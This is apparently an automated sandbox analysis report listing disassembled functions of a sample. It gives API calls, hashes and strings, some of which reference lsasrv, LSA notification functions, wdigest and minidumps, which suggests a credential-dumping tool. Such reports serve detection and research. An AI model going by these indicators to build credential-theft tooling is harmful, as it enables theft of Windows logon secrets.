                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _errno$AllocateHeapSleep_callnewhmalloc
                                                • String ID:
                                                • API String ID: 3606348469-0
                                                • Opcode ID: cabcdb51b3bd1ac8b42cf06bf0904e8802bac5ce071706a98b2f21ac3ce61c0d
                                                • Instruction ID: f0eaad7d1373c46f374fba4181fbd8792f2e653747f2c1a62fcbe0a6d9db3e3f
                                                • Opcode Fuzzy Hash: cabcdb51b3bd1ac8b42cf06bf0904e8802bac5ce071706a98b2f21ac3ce61c0d
                                                • Instruction Fuzzy Hash: 1201DB3261478586E650BF06D80005DB3A1FB88F90FD81139EE8D17751DF39F881CB85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E9075A0 Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(?,?,?,00007FF72E9052AB,?,?,00000002,00007FF72E905819,?,?,?,?,00007FF72E90436D), ref: 00007FF72E9075E5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Sleep_errno
                                                • String ID:
                                                • API String ID: 1068366078-0
                                                • Opcode ID: c0b535ad7735b5aaa1a7a144473e21ad36ee7b4f65930020565906d9da4b0b58
                                                • Instruction ID: 788ae677032f08eacf92943f0227e0a4ed28414a4ab19bb91df177161bf20fe5
                                                • Opcode Fuzzy Hash: c0b535ad7735b5aaa1a7a144473e21ad36ee7b4f65930020565906d9da4b0b58
                                                • Instruction Fuzzy Hash: F301A732A14B4585EA54AF16D80002DF6A2F788FD0B89113AEE9E07755CF3DE851CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00007FF72E902610 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 145libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule$InitStringUnicode
                                                • String ID: LoadLibraryW$LocalAlloc$LsaICancelNotification$LsaIRegisterNotification$kernel32$lsasrv$lsasrv.dll
                                                • API String ID: 3738668-4050322347
                                                • Opcode ID: 3de30d6e50a47cc1e8fa4c930ac3fbed2600160da6681a3b173b9f4a7a194a84
                                                • Instruction ID: 9c7bac86f80bed4d66a40a961cd1ce31db0607b27a3e87091c47a1720e7466ff
                                                • Opcode Fuzzy Hash: 3de30d6e50a47cc1e8fa4c930ac3fbed2600160da6681a3b173b9f4a7a194a84
                                                • Instruction Fuzzy Hash: B5711B36A09B0799EB40EF55EC905B8B3A4EB44784FC4403BCA8D57724EE3CE559CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E905C78 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                • API String ID: 2183313154-4022980321
                                                • Opcode ID: dcda75584b8517e25de290891c31400e0d26b97007449570066c954a9f79e6da
                                                • Instruction ID: 376a1609832a498efa8849d7e7584b71df66e2e58ec85185d31c43d99ecffaa9
                                                • Opcode Fuzzy Hash: dcda75584b8517e25de290891c31400e0d26b97007449570066c954a9f79e6da
                                                • Instruction Fuzzy Hash: C451BF31B1865282FB74B725EC156AAA295FF85784FC4013BEEDD42A85DF3CE5018A22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E907270 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                • String ID:
                                                • API String ID: 3778485334-0
                                                • Opcode ID: 7be16279bd0ca890dda24cf68bf581e3bb9519a935480ce7e5e99a288567db6b
                                                • Instruction ID: 8ed063897fba5e3b3a60edd17a1af8095a2c24e497d41c1728be58d90ff95920
                                                • Opcode Fuzzy Hash: 7be16279bd0ca890dda24cf68bf581e3bb9519a935480ce7e5e99a288567db6b
                                                • Instruction Fuzzy Hash: 38310835A08B4689EA90AB15FC4436AB3A4FB48750FC0143BDACD57764DF7DE044CB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E9055B8 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: c10b66f4ad814e9fa5aeb7ac24dc57c405e661451348fa1c704a1c9b0a9cf0d4
                                                • Instruction ID: 54b144e32f8f34db677f83723dcfc1d5a8ba62754717e0740cb5a328497eb747
                                                • Opcode Fuzzy Hash: c10b66f4ad814e9fa5aeb7ac24dc57c405e661451348fa1c704a1c9b0a9cf0d4
                                                • Instruction Fuzzy Hash: 16315132608B8186EB60EF25E8402AEB3A4FB88754FD0053AEADD43B95DF78D545CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E9088B4 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                • API String ID: 2643518689-564504941
                                                • Opcode ID: 983c9f2333094e1b072063431f3be2ba307fb593598efd7c4007a27adeb72045
                                                • Instruction ID: 2741c03800bb0a4eacb95d56e021af2b4bc0a41c9fef033b5323542664029578
                                                • Opcode Fuzzy Hash: 983c9f2333094e1b072063431f3be2ba307fb593598efd7c4007a27adeb72045
                                                • Instruction Fuzzy Hash: 7B510B60B0AB0695ED65BB12EC14138A3A1EF49B94FC4043FDCCE06750EE7CE545DB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E903BCC Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 149libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: FreeLocal$AddressHandleModuleProcwsprintf
                                                • String ID: %lS%lS%lS:%lS$WriteFile$kernel32
                                                • API String ID: 602150089-2677625405
                                                • Opcode ID: 70e0f67277f0841249df6cb2576359257559e6208f03e54691c210a9b83f7430
                                                • Instruction ID: 0daecf80f8e4ac393bdab0eaa277918188dbe913371b3d5ca883ebc7e1498c7b
                                                • Opcode Fuzzy Hash: 70e0f67277f0841249df6cb2576359257559e6208f03e54691c210a9b83f7430
                                                • Instruction Fuzzy Hash: 85515B61B08B4681EE54EB12EC44279A3A0FF45B84FC4413ADD9E4B7A5CF3CE589CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E90106C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FreeLocal
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 3514375268-3502785670
                                                • Opcode ID: 6bd0fb887aef256e37558b6eca73b75d724f5de7622ad22812177d065e869bd8
                                                • Instruction ID: 5ff77ba074a294be51f29a50d0c3a5bae18c6839624dfe3e69b87d319fde996d
                                                • Opcode Fuzzy Hash: 6bd0fb887aef256e37558b6eca73b75d724f5de7622ad22812177d065e869bd8
                                                • Instruction Fuzzy Hash: 69415C75B04B0685EA58AF16EC44229E761FB89F84FD4803ACE8E17354DE3DDC89CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E903080 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E9030EA
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E9030FA
                                                • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E9031CE
                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E9031DE
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E90324C
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF72E90303E), ref: 00007FF72E903255
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLocalModuleProc
                                                • String ID: KSSM$LocalAlloc$RUUU$kernel32
                                                • API String ID: 1697219777-2069434485
                                                • Opcode ID: 98452fb87b6a503e7525daa5d99c8607968f07bcedb0029b331a5fc9e0c253e1
                                                • Instruction ID: 904dcb70e155ec57b8b5207ac98f7709035f7014d89f6bf269f4001597a5405e
                                                • Opcode Fuzzy Hash: 98452fb87b6a503e7525daa5d99c8607968f07bcedb0029b331a5fc9e0c253e1
                                                • Instruction Fuzzy Hash: 34517F71B18B2289EB50DB62EC445ADB374FB44B88BC4403ADE8E43B98DF38D545CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E90162C Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66filelibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: File$HandleView$AddressCloseCreateMappingModuleProcUnmap
                                                • String ID: LocalAlloc$MDMP$kernel32
                                                • API String ID: 3734750734-1949004057
                                                • Opcode ID: 116d9f2a7bbc1342e99dcb4cdffffe6c648fd1123236cbe15307c43cc3f19f43
                                                • Instruction ID: cc420e71b5f4e45743d1fad382eb7bcc92bfcbe2e7b9afdf66b83ca3294740ef
                                                • Opcode Fuzzy Hash: 116d9f2a7bbc1342e99dcb4cdffffe6c648fd1123236cbe15307c43cc3f19f43
                                                • Instruction Fuzzy Hash: BD218436A04A45C2EB15DF26E850628B3B0FB89F48BC4C136CA8D07B14DF3CD555CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E906D10 Relevance: 12.2, APIs: 8, Instructions: 206COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906DAA
                                                • malloc.LIBCMT ref: 00007FF72E906E13
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906E47
                                                • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906E6E
                                                • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906EB6
                                                • malloc.LIBCMT ref: 00007FF72E906F13
                                                  • Part of subcall function 00007FF72E908D54: _FF_MSGBANNER.LIBCMT ref: 00007FF72E908D84
                                                  • Part of subcall function 00007FF72E908D54: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72E907550,?,?,?,00007FF72E907415,?,?,?,00007FF72E9074BF), ref: 00007FF72E908DA9
                                                  • Part of subcall function 00007FF72E908D54: _callnewh.LIBCMT ref: 00007FF72E908DC2
                                                  • Part of subcall function 00007FF72E908D54: _errno.LIBCMT ref: 00007FF72E908DCD
                                                  • Part of subcall function 00007FF72E908D54: _errno.LIBCMT ref: 00007FF72E908DD8
                                                • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906F48
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72E90704D), ref: 00007FF72E906F88
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiStringWide$_errnomalloc$AllocateHeap_callnewh
                                                • String ID:
                                                • API String ID: 1202131735-0
                                                • Opcode ID: dd9570aa4753c2afcf5721764926eca41ff4862465789e9c0155039f71b2df62
                                                • Instruction ID: 6d4617c7a7acb57a9916c8e652fa22a6c9b704f783b72561df51567a3de891dc
                                                • Opcode Fuzzy Hash: dd9570aa4753c2afcf5721764926eca41ff4862465789e9c0155039f71b2df62
                                                • Instruction Fuzzy Hash: 1B81C332B0879286EB24AF25DC40169B6A5FF487A4FD4023AEA9D47FD5DF3CD5408B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E9073B4 Relevance: 9.1, APIs: 6, Instructions: 59COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockmalloc
                                                • String ID:
                                                • API String ID: 2923989369-0
                                                • Opcode ID: e440e551b0ad07899f4c880d3f1a5defb53fbcf731c378437f33f8a7493ee88d
                                                • Instruction ID: 1868bbdf24d4c0b27183229f67a40ee15e355c8282d077f396dec44e9147eb1a
                                                • Opcode Fuzzy Hash: e440e551b0ad07899f4c880d3f1a5defb53fbcf731c378437f33f8a7493ee88d
                                                • Instruction Fuzzy Hash: F5213921E1864282F664BB21EC0437AA656EF407A4FD4443EDACE467D2CF7DA4848B62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E903A60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: FreeLocal$AddressComputerHandleModuleNameProc
                                                • String ID: wdigest
                                                • API String ID: 3388486035-141766858
                                                • Opcode ID: 921b520e0e78bd4b07dbd0b9b6bee5ed3c5810e11c76f82449315c0cb00326d4
                                                • Instruction ID: 0da27f5f5f449529099fd622c104ba6a3ff4ac248279c220466c0becabc15ea9
                                                • Opcode Fuzzy Hash: 921b520e0e78bd4b07dbd0b9b6bee5ed3c5810e11c76f82449315c0cb00326d4
                                                • Instruction Fuzzy Hash: 9F41A132B1CA0286EA64EB55D894379A391FF85B84FC4413EDA9D43790DF7CE885CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E903F50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FreeLocal$ControlDeviceFileMemoryPointerProcessWrite
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 921870457-3502785670
                                                • Opcode ID: c2d3718dd5d60db368948a814df00d793689cacde74765b4f95d6400b201580f
                                                • Instruction ID: 44713fc5fbeb49fd75eed6233cc3158a5c23df8e17b89fc28d3bc44ed6946ab2
                                                • Opcode Fuzzy Hash: c2d3718dd5d60db368948a814df00d793689cacde74765b4f95d6400b201580f
                                                • Instruction Fuzzy Hash: 9C312D72A04B06C9EB10DF61EC400AC73B4FB49788B84453ADE8D57B58DF38E554CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E904046 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLocalModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 1697219777-3502785670
                                                • Opcode ID: 10c26d9d398fdaec95026ad6e01248a2c3b5e10236f96505c4f08843d7340071
                                                • Instruction ID: ecb22b6fb4196a4d54fc9597eac51aaa1c86dc1eee540d8962610cd7f487e243
                                                • Opcode Fuzzy Hash: 10c26d9d398fdaec95026ad6e01248a2c3b5e10236f96505c4f08843d7340071
                                                • Instruction Fuzzy Hash: 16312861A19B0689FB40EB60EC403BC63B4FB55788FC0053ACA9C17664EF7CE584CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E908690 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E9086B9
                                                • DecodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E9086C9
                                                  • Part of subcall function 00007FF72E90918C: _errno.LIBCMT ref: 00007FF72E909195
                                                  • Part of subcall function 00007FF72E90918C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72E9091A0
                                                • EncodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E908747
                                                  • Part of subcall function 00007FF72E907624: realloc.LIBCMT ref: 00007FF72E90764F
                                                  • Part of subcall function 00007FF72E907624: Sleep.KERNEL32(?,?,00000000,00007FF72E908737,?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02), ref: 00007FF72E90766B
                                                • EncodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E908757
                                                • EncodePointer.KERNEL32(?,?,?,00007FF72E9087A5,?,?,?,?,00007FF72E905A02,?,?,?,00007FF72E90454C), ref: 00007FF72E908764
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
